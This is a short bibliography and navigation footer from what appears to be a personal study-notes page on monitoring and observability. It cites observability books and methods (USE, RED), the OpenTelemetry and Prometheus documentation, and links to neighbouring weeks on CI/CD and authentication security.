Charity Majors et al., Observability Engineering (O’Reilly)
Brendan Gregg, Systems Performance — USE Method
Tom Wilkie, RED Method — https://grafana.com/blog/2018/08/02/the-red-method-how-to-instrument-your-services/
OpenTelemetry Documentation — https://opentelemetry.io/docs/
Prometheus Documentation — https://prometheus.io/docs/
sdi.anhvy.dev — Vietnamese System Design Reference
Tuan-12-CICD-Pipeline — CI/CD pipeline (tuần trước)
Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization (tuần sau)

Tuần trước: Tuan-12-CICD-Pipeline — CI/CD Pipeline Tuần sau: Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization Security

lthieu's notes

Explorer

Tuan-13-Monitoring-Observability